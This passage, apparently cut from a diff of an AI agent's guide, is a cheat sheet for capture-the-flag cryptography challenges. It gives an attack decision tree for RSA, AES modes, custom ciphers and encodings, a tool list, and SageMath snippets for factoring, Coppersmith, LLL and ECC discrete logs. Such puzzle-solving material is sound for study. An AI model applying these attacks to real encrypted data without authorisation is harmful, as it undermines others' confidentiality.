- ├── Check e: small e → Hastad/cube root, large e → Wiener/Boneh-Durfee
241
- ├── Multiple ciphertexts? → CRT / Franklin-Reiter
242
- └── Weird parameters? → web_search("RSA CTF <description>")
243
- 4. For AES:
244
- ├── ECB? → byte-at-a-time or ECB penguin
245
- ├── CBC? → padding oracle or bit-flip
246
- ├── CTR? → nonce reuse → XOR
247
- └── Custom mode? → analyze and find weakness
248
- 5. For custom cipher:
249
- ├── Read the code CAREFULLY
250
- ├── Look for: weak randomness, reused key, algebraic weakness
251
- ├── Z3 solver for constraint problems
252
- └── Brute-force if keyspace < 2^32
253
- 6. For encoding puzzles:
254
- ├── CyberChef Magic (auto-detect)
255
- ├── Multi-layer decode: base64 → hex → XOR → rot13
256
- └── dcode.fr for classical ciphers
257
-
258
- Essential tools:
259
- ├── RsaCtfTool: github.com/RsaCtfTool/RsaCtfTool
260
- ├── SageMath: for all mathematical crypto
261
- ├── CyberChef: gchq.github.io/CyberChef
262
- ├── PyCryptodome: python crypto library
263
- ├── z3-solver: constraint solving
264
- ├── factordb.com: integer factorization
265
- └── dcode.fr: classical cipher solver
266
- ```
267
-
268
- ## SageMath Essential Patterns
269
-
270
- ```python
271
- # RSA decryption
272
- n, e, c = ...
273
- p, q = factor(n) # or from factordb
274
- phi = (p-1)*(q-1)
275
- d = inverse_mod(e, phi)
276
- m = pow(c, d, n)
277
- bytes.fromhex(hex(m)[2:])
278
-
279
- # Coppersmith (small roots)
280
- P.<x> = PolynomialRing(Zmod(n))
281
- f = x + known_prefix
282
- roots = f.small_roots(X=2^64, beta=0.5)
283
-
284
- # Lattice reduction (LLL)
285
- M = matrix(ZZ, [...])
286
- M_reduced = M.LLL()
287
-
288
- # ECC discrete log
289
- E = EllipticCurve(GF(p), [a, b])
290
- G = E(Gx, Gy)
291
- P = E(Px, Py)
292
- d = discrete_log(P, G, G.order(), operation='+')
293
-
294
- # CRT
295
- x = crt([r1, r2, r3], [m1, m2, m3])
296
- ```